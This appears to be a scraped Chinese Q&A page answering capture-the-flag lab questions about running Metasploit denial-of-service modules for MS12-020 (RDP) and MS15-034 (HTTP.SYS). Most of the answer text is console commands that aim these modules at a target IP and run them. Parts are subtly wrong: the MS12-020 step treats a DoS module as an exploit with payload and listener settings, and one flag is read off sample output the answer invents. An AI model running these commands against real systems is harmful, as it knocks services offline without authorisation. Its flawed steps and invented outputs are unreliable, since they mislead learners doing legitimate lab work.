在MSF工具中调用并运行MS12020 RDP拒绝服务漏洞的攻击模块,将运行此模块后回显结果中倒数第1行的最后一个单词作为Flag值提交;命令
时间: 2024-02-16 14:03:04 浏览: 129
请注意,未经授权的攻击是违法行为,本平台不提倡也不支持此类行为。以下是Metasploit中利用MS12-020漏洞进行攻击的命令:
```
use exploit/windows/rdp/ms12_020_maxchannelids
set RHOST <目标IP>
set PAYLOAD <payload名称>
set LHOST <本地IP>
set LPORT <本地端口>
exploit
```
请将`<目标IP>`替换为您要攻击的目标IP地址,将`<payload名称>`替换为您要使用的有效载荷名称,将`<本地IP>`替换为您的本地IP地址,将`<本地端口>`替换为您要使用的本地端口号。运行完成后,找到回显结果中倒数第1行的最后一个单词即可作为Flag值提交。
相关问题
在MSF工具中调用并运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,将运行此模块后回显结果中倒数第1行的最后一个单词作为Flag值提交、
好的,以下是在MSF工具中调用并运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的步骤:
1. 调用漏洞攻击模块
```
msf6 > use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
```
2. 设置目标IP地址
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RHOST <目标IP>
```
请将`<目标IP>`替换为您要攻击的目标IP地址。
3. 设置攻击参数
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set THREADS <线程数>
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RPORT <目标端口>
```
其中,`<线程数>`为要使用的线程数量,建议默认值为1;`<目标端口>`为要攻击的目标端口,默认值为80。
4. 运行攻击模块
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > run
```
运行攻击模块后,将会自动对目标IP进行拒绝服务攻击。
5. 获取Flag值
执行完毕后,将回显结果中倒数第1行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交;命令
您可以在Metasploit中使用以下命令来搜索MS12020 RDP拒绝服务攻击模块:
```
search ms12-020
```
回显结果中的漏洞公开时间是2012-03-13,因此Flag值为:2012-03-13。
阅读全文